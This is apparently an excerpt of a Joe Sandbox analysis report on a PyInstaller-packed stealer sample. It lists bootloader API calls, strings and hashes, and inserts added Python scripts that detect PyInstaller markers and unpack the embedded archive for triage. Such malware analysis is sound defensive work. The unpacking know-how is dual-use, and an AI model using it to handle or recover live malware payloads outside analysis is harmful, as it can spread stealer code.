                                                                                                                       • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharEnvironmentExpandMultiStringsWide
                                                                                                                      • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                      • API String ID: 2001182103-3498232454
                                                                                                                      • Opcode ID: 5ee21e0b03b93b25bef8ac72ef4e73b9d88e21dff718041967e82cd7cddf670f
                                                                                                                      • Instruction ID: 0775316f8e7b2361801366cbb119a9c9085e343a939174f261a955557ce3968e
                                                                                                                      • Opcode Fuzzy Hash: 5ee21e0b03b93b25bef8ac72ef4e73b9d88e21dff718041967e82cd7cddf670f
                                                                                                                      • Instruction Fuzzy Hash: D2311CB2A406006BE6247374AC47FAB72989F84B12F440535FF09D7282F978E50C92D7
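The loader functions above (the archive-extraction error messages, the GetTempPathW / GetCurrentProcessId / "_MEI%d" / SetEnvironmentVariableW("TMP") sequence, and the "pyi-runtime-tmpdir" and "_MEIPASS2" handling) are the PyInstaller onefile bootloader, which matches the report's "Found pyInstaller with non standard icon" signature; they are packer indicators, not LummaC indicators. The script below is an added triage example, not part of the Joe Sandbox report or of the PyInstaller project: it flags a sample as PyInstaller-packed when several of those marker strings (in ASCII or UTF-16LE form) are present, and reconstructs the `<TMP>\_MEI<pid>` extraction directory the bootloader builds from those API calls so an analyst can hunt leftover extraction artifacts. The sample blobs, the marker list and the three-hit threshold are constructed for the example; loader messages vary between PyInstaller versions, so treat a hit as a triage hint rather than proof.

```python
"""Triage helper: flag a PyInstaller-packed PE from its bootloader strings.

Added example, not code from the Joe Sandbox report or from PyInstaller.
The marker strings are the ones the report lists for this sample's loader
functions; the sample blobs below are constructed so the script runs offline.
"""

# Marker strings taken from the report's "String ID" / "Strings" entries.
# The bootloader stores some of these as ASCII and some as UTF-16LE wide
# strings, so both encodings are searched.
PYI_MARKERS = [
    b"_MEIPASS2",
    b"pyi-runtime-tmpdir",
    b"_MEI%d",
    b"LOADER: Failed to set the TMP environment variable.",
    b"Archive not found: %s",
    b"Error extracting %s",
    b"Failed to extract %s: failed to open archive file!",
]

# Assumed threshold: require several distinct markers before calling it
# PyInstaller; a single string such as "_MEI%d" is too weak on its own.
MIN_HITS = 3


def _encodings(marker: bytes):
    """Yield the ASCII form and the UTF-16LE (wide) form of a marker."""
    yield marker
    yield marker.decode("ascii").encode("utf-16-le")


def find_pyinstaller_markers(data: bytes) -> list:
    """Return the distinct marker strings present in data, in PYI_MARKERS order."""
    hits = []
    for marker in PYI_MARKERS:
        if any(enc in data for enc in _encodings(marker)):
            hits.append(marker.decode("ascii"))
    return hits


def is_pyinstaller_packed(data: bytes) -> bool:
    """True when at least MIN_HITS distinct bootloader markers are found."""
    return len(find_pyinstaller_markers(data)) >= MIN_HITS


def expected_extraction_dir(temp_path: str, pid: int) -> str:
    """Directory the onefile bootloader unpacks into.

    The report shows GetTempPathW, GetCurrentProcessId and the "_MEI%d"
    format string in one function, followed by SetEnvironmentVariableW
    on TMP: the loader extracts its archive under <temp>\\_MEI<pid>.
    Windows path separators are used on purpose.
    """
    return temp_path.rstrip("\\/") + "\\" + "_MEI%d" % pid


def scan_file(path: str) -> dict:
    """Scan a file on disk and return a small triage record."""
    with open(path, "rb") as fh:
        data = fh.read()
    hits = find_pyinstaller_markers(data)
    return {"path": path, "markers": hits, "pyinstaller": len(hits) >= MIN_HITS}


# Constructed sample input: a fake PE-like blob carrying four loader strings
# (one of them as a wide string), and a clean blob for comparison.
SAMPLE_PACKED = (
    b"MZ\x90\x00" + b"\x00" * 64
    + b"_MEIPASS2\x00"
    + "pyi-runtime-tmpdir".encode("utf-16-le") + b"\x00\x00"
    + b"LOADER: Failed to set the TMP environment variable.\x00"
    + b"Archive not found: %s\x00"
)
SAMPLE_CLEAN = b"MZ\x90\x00" + b"\x00" * 64 + b"Hello, world\x00"


if __name__ == "__main__":
    print("packed markers:", find_pyinstaller_markers(SAMPLE_PACKED))
    print("packed:", is_pyinstaller_packed(SAMPLE_PACKED),
          "clean:", is_pyinstaller_packed(SAMPLE_CLEAN))
    # Assumed temp path and PID for illustration only.
    print("look for:", expected_extraction_dir(
        "C:\\Users\\victim\\AppData\\Local\\Temp\\", 4812))
```

On a live host, pair `expected_extraction_dir` with the PID from process telemetry: if the loader was killed before cleanup, the `_MEI<pid>` directory still holds the unpacked Python runtime and the stealer's bundled files, which is often the quickest way to recover the second-stage payload the report's injection signatures refer to.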
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(?), ref: 00F51E50
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00F51EA0
                                                                                                                      • DrawTextW.USER32(00000000,?,000000FF,?,00002550), ref: 00F51EB5
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00F51EC6
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00F51ECF
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F1C
                                                                                                                      • MoveWindow.USER32(?,?,?,?,00000014,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F4B
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,00000014,00000001), ref: 00F51F95
                                                                                                                      • MoveWindow.USER32(?,?,00000000,?,?,00000001,?,?,?,00000014,00000001), ref: 00F51FCA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2147705588-0
                                                                                                                      • Opcode ID: a541af4a0bd3edb6ee3ccae4f94c33fe04acaef8439d3bec591122df70117b51
                                                                                                                      • Instruction ID: e3f4b86dfca041221862fb3933a24816087f14b65d557c3100a17000a34a8018
                                                                                                                      • Opcode Fuzzy Hash: a541af4a0bd3edb6ee3ccae4f94c33fe04acaef8439d3bec591122df70117b51
                                                                                                                      • Instruction Fuzzy Hash: 69418C71604310AFD724DF2DCC889BBB7E9FB88701F41052EF98AC2291E675AD44E761
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F534A0: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00F52F89,?,?), ref: 00F534CC
                                                                                                                      • SetDllDirectoryW.KERNEL32(?), ref: 00F531C1
                                                                                                                        • Part of subcall function 00F55C60: GetEnvironmentVariableW.KERNEL32(00000000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55C96
                                                                                                                        • Part of subcall function 00F55C60: ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55CB2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                      • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                      • API String ID: 2344891160-3602715111
                                                                                                                      • Opcode ID: 4c4b0b2153d90a0d14d1e2cb2daf23b9758db266b787e27807be679d8d8190bf
                                                                                                                      • Instruction ID: ed3398947a25329c485e641722581280a5255d89ddfcac71a0405a9ef43fc0bf
                                                                                                                      • Opcode Fuzzy Hash: 4c4b0b2153d90a0d14d1e2cb2daf23b9758db266b787e27807be679d8d8190bf
                                                                                                                      • Instruction Fuzzy Hash: 0EB13B72D087416BC711AA749C42BAF77DCAF5475AF040529FF8882142E769E70CB7A3
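The function above is the PyInstaller bootloader locating its embedded archive: the _MEIPASS2 environment variable, the "Cannot open PyInstaller archive from executable (%s) or external archive (%s)" message and the MEI string are the bootloader's own, which is what the "Found pyInstaller" signature in this report keys on. For triage it is usually faster to pull the archive apart offline than to let the sample run. The script below is an added example written for this page; it is neither Joe Sandbox output nor PyInstaller's code. It finds the CArchive cookie by its 8-byte MEI magic, parses the cookie and the table of contents, and extracts an entry, inflating it when the compression flag is set. The cookie layout (!8sIIii64s) and TOC entry layout (!iIIIBc followed by a NUL-padded name) are PyInstaller's published formats; the executable it parses is a constructed byte blob (a fake stub plus a two-entry archive built by build_sample), not ceFgl3jkkk.exe, and the entry names, the stub bytes and the helper names are hypothetical.

```python
import struct
import zlib
from typing import List, NamedTuple

# PyInstaller CArchive cookie (network byte order): 8-byte magic, package
# length, TOC offset and length (relative to package start), Python version,
# 64-byte Python DLL name. 88 bytes in total.
PYI_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)
# TOC entry header: entry length, data offset, compressed size,
# uncompressed size, compression flag, type code; the name follows, NUL padded.
TOC_ENTRY_FMT = "!iIIIBc"
TOC_ENTRY_HDR = struct.calcsize(TOC_ENTRY_FMT)


class TocEntry(NamedTuple):
    name: str
    offset: int            # absolute file offset of the entry data
    compressed_size: int
    uncompressed_size: int
    compressed: bool
    typecode: str          # e.g. 's' script, 'b' binary, 'z' PYZ archive


class PyiArchive(NamedTuple):
    python_version: str
    pylib_name: str
    package_start: int
    entries: List[TocEntry]


def parse_pyinstaller(data: bytes) -> PyiArchive:
    """Locate the cookie and parse the TOC of a PyInstaller-packed executable."""
    # Search backwards: data such as an Authenticode signature may follow the cookie.
    cookie_pos = data.rfind(PYI_MAGIC)
    if cookie_pos < 0:
        raise ValueError("no PyInstaller cookie found")
    _, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack_from(
        COOKIE_FMT, data, cookie_pos)
    # The package length counts the cookie itself, so the package starts here:
    package_start = cookie_pos + COOKIE_SIZE - pkg_len
    if package_start < 0 or toc_off + toc_len > pkg_len:
        raise ValueError("inconsistent cookie")
    # Newer bootloaders store major*100+minor (e.g. 311), older ones major*10+minor.
    major, minor = divmod(pyvers, 100) if pyvers >= 100 else divmod(pyvers, 10)

    entries = []
    pos = package_start + toc_off
    end = pos + toc_len
    while pos < end:
        entry_len, off, csize, usize, cflag, tc = struct.unpack_from(
            TOC_ENTRY_FMT, data, pos)
        if entry_len < TOC_ENTRY_HDR or pos + entry_len > end:
            raise ValueError("corrupt TOC entry")
        name = data[pos + TOC_ENTRY_HDR:pos + entry_len].rstrip(b"\x00")
        entries.append(TocEntry(name.decode("utf-8", "replace"),
                                package_start + off, csize, usize,
                                bool(cflag), tc.decode("ascii")))
        pos += entry_len
    return PyiArchive(f"{major}.{minor}",
                      pylib.rstrip(b"\x00").decode("ascii", "replace"),
                      package_start, entries)


def extract_entry(data: bytes, entry: TocEntry) -> bytes:
    """Return an entry's payload, inflating it if the compression flag is set."""
    raw = data[entry.offset:entry.offset + entry.compressed_size]
    return zlib.decompress(raw) if entry.compressed else raw


def _toc_entry(name: bytes, off: int, csize: int, usize: int,
               compressed: bool, typecode: bytes) -> bytes:
    # PyInstaller pads each TOC entry to a multiple of 16 bytes.
    length = TOC_ENTRY_HDR + len(name) + 1
    length += (16 - length % 16) % 16
    hdr = struct.pack(TOC_ENTRY_FMT, length, off, csize, usize,
                      int(compressed), typecode)
    return hdr + name.ljust(length - TOC_ENTRY_HDR, b"\x00")


def build_sample() -> bytes:
    """Constructed test input: a hypothetical stub followed by a two-entry archive."""
    stub = b"MZ" + b"\x00" * 62          # not a real PE, just a prefix
    script = b"print('hello')\n"
    binary = b"\x7fELF" + b"A" * 200     # arbitrary bytes standing in for a DLL
    binary_z = zlib.compress(binary)
    toc = (_toc_entry(b"entry_script", 0, len(script), len(script), False, b"s")
           + _toc_entry(b"helper.dll", len(script), len(binary_z), len(binary),
                        True, b"b"))
    body = script + binary_z
    pkg_len = len(body) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, PYI_MAGIC, pkg_len, len(body), len(toc),
                         311, b"python311.dll")
    return stub + body + toc + cookie


if __name__ == "__main__":
    blob = build_sample()
    arc = parse_pyinstaller(blob)
    print(f"Python {arc.python_version} ({arc.pylib_name}), package at {arc.package_start:#x}")
    for e in arc.entries:
        print(f"  {e.typecode} {e.name:20s} {len(extract_entry(blob, e))} bytes")
```

On a real sample, pass the file bytes to parse_pyinstaller and look for the 's' entries: those are the packed scripts, and the real payload (here the LummaC injector) is typically the entry whose name matches the original project, not the bootstrap scripts. Entries of type 'z' are a nested PYZ archive of marshalled modules and need the matching Python version to decompile, which is why the cookie's version field is worth reading first.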
                                                                                                                      APIs
                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F56709
                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F5673E
                                                                                                                      Strings
                                                                                                                      • Out of memory., xrefs: 00F56767
                                                                                                                      • Failed to encode wchar_t as UTF-8., xrefs: 00F56760
                                                                                                                      • win32_utils_to_utf8, xrefs: 00F5676C
                                                                                                                      • Failed to get UTF-8 buffer size., xrefs: 00F56773
                                                                                                                      • WideCharToMultiByte, xrefs: 00F56778
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                      • API String ID: 626452242-27947307
                                                                                                                      • Opcode ID: ec28fa44013c6e1e09b884fb896ab70a358caffb35033fcf37c5922c6e83dc82
                                                                                                                      • Instruction ID: 3b749cbd0952adfff472b126a4938a46b6872cbf4caadd73a4212a003a757894
                                                                                                                      • Opcode Fuzzy Hash: ec28fa44013c6e1e09b884fb896ab70a358caffb35033fcf37c5922c6e83dc82
                                                                                                                      • Instruction Fuzzy Hash: DF313C71644305ABDB106E64BC82F1677D4EB44B26F500536FF54EB2C0EAA5E90CA263
                                                                                                                      APIs
                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00F5663C,00F8DC48,?,00001000,?,?), ref: 00F56A4A
                                                                                                                        • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,00000000,00F5663C,00F8DC48,?,00001000,?,?), ref: 00F56AAF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                      • API String ID: 1717984340-27947307
                                                                                                                      • Opcode ID: 6f52a251bf29f1bf449b33a4b3293576c740d20072ae93535e9e485171440620
                                                                                                                      • Instruction ID: fe01976edd1574eceb9f11c660a5b0c0080faa7e6646e9a9a67f5b95292af34c
                                                                                                                      • Opcode Fuzzy Hash: 6f52a251bf29f1bf449b33a4b3293576c740d20072ae93535e9e485171440620
                                                                                                                      • Instruction Fuzzy Hash: D401E137B45221B6DA6061697C06F8B3A99CB86F72F154222FF1CE62C0E190E90671A3
                                                                                                                      APIs
                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00F5ADF7
                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00F5ADFF
                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00F5AE88
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00F5AEB3
                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00F5AF08
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                      • String ID: csm
                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                      • Opcode ID: bc6629a90984b088dfea3498b4301f573e68f9f55ff78c0580e79afcbc2f16e7
                                                                                                                      • Instruction ID: 25227c0d234729539fdd7d9042b3328721c1a038aee64d02ba9f913a7ff1b066
                                                                                                                      • Opcode Fuzzy Hash: bc6629a90984b088dfea3498b4301f573e68f9f55ff78c0580e79afcbc2f16e7
                                                                                                                      • Instruction Fuzzy Hash: AC41E330E002089BCF00DF69CC85A9EBBB1AF05325F148255EE185B352D735DA29EB92
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,00000000,?,?), ref: 00F56B35
                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00F56B66
                                                                                                                      Strings
                                                                                                                      • Out of memory., xrefs: 00F56B8F
                                                                                                                      • win32_utils_from_utf8, xrefs: 00F56B94
                                                                                                                      • Failed to get wchar_t buffer size., xrefs: 00F56B9B
                                                                                                                      • Failed to decode wchar_t from UTF-8, xrefs: 00F56B88
                                                                                                                      • MultiByteToWideChar, xrefs: 00F56BA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                      • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                      • API String ID: 626452242-876015163
                                                                                                                      • Opcode ID: 53cae9a9c7cf728b0d509f7a7bdf7aacd45a71f69e4a6ecb6d1fa079dfe46698
                                                                                                                      • Instruction ID: 991e8fc00a0d3e23406f830713655dbb03e6d62a53b6a6bfcae64e0ee9683035
                                                                                                                      • Opcode Fuzzy Hash: 53cae9a9c7cf728b0d509f7a7bdf7aacd45a71f69e4a6ecb6d1fa079dfe46698
                                                                                                                      • Instruction Fuzzy Hash: 08313E72A443057BD7106E54AC41F1A7BD4EB84722F84063AFF58E72C0E6B5D90CB653
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F6A6BD: _free.LIBCMT ref: 00F6A6E2
                                                                                                                      • _free.LIBCMT ref: 00F6A743
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      • _free.LIBCMT ref: 00F6A74E
                                                                                                                      • _free.LIBCMT ref: 00F6A759
                                                                                                                      • _free.LIBCMT ref: 00F6A7AD
                                                                                                                      • _free.LIBCMT ref: 00F6A7B8
                                                                                                                      • _free.LIBCMT ref: 00F6A7C3
                                                                                                                      • _free.LIBCMT ref: 00F6A7CE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: b82a83029192d2ac4a41a466b2bc48d6a5028a36daab7583f2bc1eaf857da398
                                                                                                                      • Instruction ID: 8fc6fa305b51e44683b88a40dd04d519f63c6a23ae65a0e050bc05da06ccaf52
                                                                                                                      • Opcode Fuzzy Hash: b82a83029192d2ac4a41a466b2bc48d6a5028a36daab7583f2bc1eaf857da398
                                                                                                                      • Instruction Fuzzy Hash: D011FE71940B04FAD620BBB0CC47FDB77ECEF46700F444815B29ABA162DB6AB614AB51

APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F569A8
  • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F56A09
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
• API String ID: 1717984340-876015163
• Opcode ID: 2c3675797e2d5a051f0bdd890d8dab492bf35425fdd33ac874b4b0ce718b0c17
• Instruction ID: f6b8689687b20ebc945d1b9d33434f2a923bd80851c786a8e18e79a5d1098dfa
• Opcode Fuzzy Hash: 2c3675797e2d5a051f0bdd890d8dab492bf35425fdd33ac874b4b0ce718b0c17
• Instruction Fuzzy Hash: E7012237B8422237D66065657C06D8B7B948B91F73F054232FF2CE21C0E5A0C94A71E3

APIs
• GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00F64E36
• __fassign.LIBCMT ref: 00F6501B
• __fassign.LIBCMT ref: 00F65038
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F65080
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F650C0
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F65168
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: FileWrite__fassign$ConsoleErrorLastOutput
• String ID:
• API String ID: 1735259414-0
• Opcode ID: 1a7edef9a2e473f89dde81f5d3efe6b78d59d84f00e00641ad273451c57e4397
• Instruction ID: ec4ae302011906a40fe076b6a8c749e50aa35ce109be9874808602e1185343b7
• Opcode Fuzzy Hash: 1a7edef9a2e473f89dde81f5d3efe6b78d59d84f00e00641ad273451c57e4397
• Instruction Fuzzy Hash: 3BC19C75D002589FCF15CFE8C880AEDBBB5AF09314F28416AE855FB242D631AE46DF60

APIs
• GetLastError.KERNEL32(?,?,00F5B228,00F5B05F,00F5A0C5), ref: 00F5B23F
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F5B24D
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F5B266
• SetLastError.KERNEL32(00000000,00F5B228,00F5B05F,00F5A0C5), ref: 00F5B2B8
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
